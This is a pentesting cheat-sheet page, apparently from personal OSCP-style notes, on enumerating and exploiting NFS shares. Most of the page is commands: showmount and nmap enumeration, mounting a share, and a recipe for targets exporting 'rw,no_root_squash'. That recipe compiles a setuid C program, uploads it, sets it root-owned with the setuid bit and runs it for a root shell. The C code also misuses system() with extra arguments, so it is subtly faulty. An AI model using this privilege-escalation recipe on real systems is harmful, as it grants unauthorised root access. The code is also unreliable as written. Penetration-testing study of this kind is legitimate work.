NFS

----------------------------------------------------------------------------------------------------------------

Show all mounts
>>> showmount -e $IP
>>> showmount -a $IP
>>> nmap -sV --script=nfs-showmount $IP


Mount a NFS share
>>> mount $IP:/vol/share /mnt/nfs


→ Demo : 
root@Offsec:~$ mkdir home
root@Offsec:~$ sudo mount -o nolock $IP:/home ~/home/
root@Offsec:~$ cd home/ && ls



----------------------------------------------------------------------------------------------------------------

Some Exploitation Can Happen Here :
 
NOTE : ...and check if 'rw,no_root_squash' is present. If it is present, compile the below sid-shell.c:


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <unistd.h>

main( int argc, char ** argv, char ** envp )
{
    setgid(0); setuid(0); system("/bin/bash", argv, envp);
    return 0;
}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

...upload it to the share and execute the below to launch sid-shell to spawn a root shell:

>>> chown root:root sid-shell; chmod +s sid-shell; ./sid-shell
----------------------------------------------------------------------------------------------------------------
PreviousDomain (53)NextMSRPC (135)
Last updated 3 years ago